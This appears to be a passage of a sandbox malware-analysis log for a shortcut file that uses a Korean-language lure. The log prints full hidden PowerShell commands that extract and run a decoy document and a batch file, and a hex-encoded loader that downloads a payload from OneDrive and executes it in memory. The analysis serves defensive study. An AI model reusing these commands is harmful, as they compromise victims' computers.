crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00264920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00264920
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002643e0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 2031616
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73921000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2220
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73922000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02672000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02682000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a41000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a42000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02683000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02684000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0267b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02685000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02686000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c15000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c16000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c17000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c18000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c19000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c1f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2220
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04c24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk
file c:\Users\test22\AppData\Local\Temp\hi1x_fj5.dll
file c:\Users\test22\AppData\Local\Temp\mobuv0cw.dll
file c:\Users\test22\AppData\Local\Temp\owptouvz.dll
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp.lnk
file C:\Users\test22\AppData\Local\Temp\230509.bat
file c:\Users\test22\AppData\Local\Temp\n5j0ib9u.dll
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp.lnk
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.lnk
cmdline powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00032CA73D} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00062888)) -Encoding Byte; & $exePath;
cmdline powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
cmdline "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00032CA73D} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath;
cmdline c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
file C:\Users\test22\AppData\Local\Temp\n5j0ib9u.dll
file C:\Users\test22\AppData\Local\Temp\owptouvz.dll
file C:\Users\test22\AppData\Local\Temp\mobuv0cw.dll
file C:\Users\test22\AppData\Local\Temp\hi1x_fj5.dll
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2188
thread_handle: 0x00000334
process_identifier: 2200
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\SysWOW64\cmd.exe
track: 1
command_line: "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00032CA73D} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath;
filepath_r: C:\Windows\SysWOW64\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000033c
1 1 0

CreateProcessInternalW

 thread_identifier: 292
thread_handle: 0x00000084
process_identifier: 2220
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00032CA73D} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00062888)) -Encoding Byte; & $exePath;
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

 thread_identifier: 776
thread_handle: 0x00000088
process_identifier: 452
current_directory:
filepath: c:\Windows\SysWOW64\cmd.exe
track: 1
command_line: c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078